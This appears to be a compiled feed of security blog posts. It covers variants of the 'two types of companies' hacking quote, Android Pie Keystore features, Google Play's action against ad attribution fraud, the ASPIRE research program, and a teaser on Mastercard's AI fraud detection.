Finally, there's a fourth version introduced by Mr Mueller's successor, James Comey, as well! In a 6 October 2014 story, FBI Director: China Has Hacked Every Big US Company Mr Comey said:

Speaking to CBS' 60 Minutes, James Comey had the following to say on Chinese hackers: 

There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.

Let's call this last variant 2-CHINA.

To summarize, there are four versions of the "two companies" quote:

  • 2-KNOW, credited to Dmitri Alperovitch in 2011, says "There are only two types of companies—those that know they’ve been compromised, and those that don’t know."
  • 2-BE, credited to Robert Mueller in 2012, says "[T]here are only two types of companies: those that have been hacked and those that will be."
  • 2-AGAIN, credited to Robert Mueller in 2012, says "[There are only two types of companies:] companies that have been hacked and will be hacked again."
  • 2-CHINA, credited to James Comey in 2014, says "There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese."
Now you know!


New Keystore features keep your slice of Android Pie a little safer


Posted by Lilian Young and Shawn Willden, Android Security; and Frank Salim, Google Pay

[Cross-posted from the Android Developers Blog]

New Android Pie Keystore Features

The Android Keystore provides application developers with a set of cryptographic tools that are designed to secure their users' data. Keystore moves the cryptographic primitives available in software libraries out of the Android OS and into secure hardware. Keys are protected and used only within the secure hardware to protect application secrets from various forms of attacks. Keystore gives applications the ability to specify restrictions on how and when the keys can be used.
Android Pie introduces new capabilities to Keystore. We will be discussing two of these new capabilities in this post. The first enables restrictions on key use so as to protect sensitive information. The second facilitates secure key use while protecting key material from the application or operating system.

Keyguard-bound keys

There are times when a mobile application receives data but doesn't need to immediately access it if the user is not currently using the device. Sensitive information sent to an application while the device screen is locked must remain secure until the user wants access to it. Android Pie addresses this by introducing keyguard-bound cryptographic keys. When the screen is locked, these keys can be used in encryption or verification operations, but are unavailable for decryption or signing. If the device is currently locked with a PIN, pattern, or password, any attempt to use these keys will result in an invalid operation. Keyguard-bound keys protect the user's data while the device is locked, and only available when the user needs it.
Keyguard binding and authentication binding both function in similar ways, except with one important difference. Keyguard binding ties the availability of keys directly to the screen lock state while authentication binding uses a constant timeout. With keyguard binding, the keys become unavailable as soon as the device is locked and are only made available again when the user unlocks the device.
It is worth noting that keyguard binding is enforced by the operating system, not the secure hardware. This is because the secure hardware has no way to know when the screen is locked. Hardware-enforced Android Keystore protection features like authentication binding, can be combined with keyguard binding for a higher level of security. Furthermore, since keyguard binding is an operating system feature, it's available to any device running Android Pie.
Keys for any algorithm supported by the device can be keyguard-bound. To generate or import a key as keyguard-bound, call setUnlockedDeviceRequired(true) on the KeyGenParameterSpec or KeyProtection builder object at key generation or import.

Secure Key Import

Secure Key Import is a new feature in Android Pie that allows applications to provision existing keys into Keystore in a more secure manner. The origin of the key, a remote server that could be sitting in an on-premise data center or in the cloud, encrypts the secure key using a public wrapping key from the user's device. The encrypted key in the SecureKeyWrapper format, which also contains a description of the ways the imported key is allowed to be used, can only be decrypted in the Keystore hardware belonging to the specific device that generated the wrapping key. Keys are encrypted in transit and remain opaque to the application and operating system, meaning they're only available inside the secure hardware into which they are imported.

Secure Key Import is useful in scenarios where an application intends to share a secret key with an Android device, but wants to prevent the key from being intercepted or from leaving the device. Google Pay uses Secure Key Import to provision some keys on Pixel 3 phones, to prevent the keys from being intercepted or extracted from memory. There are also a variety of enterprise use cases such as S/MIME encryption keys being recovered from a Certificate Authorities escrow so that the same key can be used to decrypt emails on multiple devices.
To take advantage of this feature, please review this training article. Please note that Secure Key Import is a secure hardware feature, and is therefore only available on select Android Pie devices. To find out if the device supports it, applications can generate a KeyPair with PURPOSE_WRAP_KEY.

Tackling ads abuse in apps and SDKs



Providing users with safe and secure experiences, while helping developers build and grow quality app businesses, is our top priority at Google Play. And we’re constantly working to improve our protections.

Google Play has been working to minimize app install attribution fraud for several years. In 2017 Google Play made available the Google Play Install Referrer API, which allows ad attribution providers, publishers and advertisers to determine which referrer was responsible for sending the user to Google Play for a given app install. This API was specifically designed to be resistant to install attribution fraud and we strongly encourage attribution providers, advertisers and publishers to insist on this standard of proof when measuring app install ads. Users, developers, advertisers and ad networks all benefit from a transparent, fair system.

We also take reports of questionable activity very seriously. If an app violates our Google Play Developer policies, we take action. That’s why we began our own independent investigation after we received reports of apps on Google Play accused of conducting app install attribution abuse by falsely claiming credit for newly installed apps to collect the download bounty from that app’s developer.

We now have an update regarding our ongoing investigation:

  • On Monday, we removed two apps from the Play Store because our investigation discovered evidence of app install attribution abuse.
  • We also discovered evidence of app install attribution abuse in 3 ad network SDKs. We have asked the impacted developers to remove those SDKs from their apps. Because we believe most of these developers were not aware of the behavior from these third-party SDKs, we have given them a short grace period to take action.
  • Google Ads SDKs were not utilized for any of the abusive behaviors mentioned above.
  • Our investigation is ongoing and additional reviews of other apps and third party SDKs are still underway. If we find evidence of additional policy violations, we will take action.
We will continue to investigate and improve our capabilities to better detect and protect against abusive behavior and the malicious actors behind them.

ASPIRE to keep protecting billions of Android users



Customization is one of Android's greatest strengths. Android's open source nature has enabled thousands of device types that cover a variety of use cases. In addition to adding features to the Android Open Source Project, researchers, developers, service providers, and device and chipset manufacturers can make updates to improve Android security. Investing and engaging in academic research advances the state-of-the-art security techniques, contributes to science, and delivers cutting edge security and privacy features into the hands of end users. To foster more cooperative applied research between the Android Security and Privacy team and the wider academic and industrial community, we're launching ASPIRE (Android Security and PrIvacy REsearch).

ASPIRE's goal is encouraging the development of new security and privacy technology that impacts the Android ecosystem in the next 2 to 5 years, but isn't planned for mainline Android development. This timeframe extends beyond the next annual Android release to allow adequate time to analyze, develop, and stabilize research into features before including in the platform. To collaborate with security researchers, we're hosting events and creating more channels to contribute research.

On October 25th 2018, we invited top security and privacy researchers from around the world to present at Android Security Local Research Day (ASLR-D). At this event, external researchers and Android Security and Privacy team members discussed current issues and strategies that impact the future direction of security research—for Android and the entire industry.

We can't always get everyone in the same room and good ideas come from everywhere. So we're inviting all academic researchers to help us protect billions of users. Research collaborations with Android should be as straightforward as collaborating with the research lab next door. To get involved you can:

  1. Submit an Android security / privacy research idea or proposal to the Google Faculty Research Awards (FRA) program.
  2. Apply for a research internship as a student pursuing an advanced degree.
  3. Apply to become a Visiting Researcher at Google.
  4. If you have any security or privacy questions that may help with your research, reach out to us.
  5. Co-author publications with Android team members, outside the terms of FRA.
  6. Collaborate with Android team members to make changes to the Android Open Source Project.

Let’s work together to make Android the most secure platform—now and in the future.

3 ways Mastercard uses AI to fight fraud

Credit card giant Mastercard envisions a future where consumers make purchases not only from smartphones, but via virtual assistants, cars and other connected machines. But with hackers trolling the dark corners of the web to grab financial gain with minimal effort, Mastercard must also be able to vet and secure purchases in mere milliseconds.

To facilitate its vision for a veritable Cambrian explosion in digital payments, Mastercard is using sophisticated fraud analytics systems and software, which is being increasingly augmented with artificial intelligence (AI) technologies, Ed McLaughlin, president of operations and technology at Mastercard, tells CIO.com. AI can help software and connected systems facilitate more secure payments than a human checking out at a kiosk using the traditional plastic card — even one with a chip embedded in it.

To read this article in full, please click here

(Insider Story)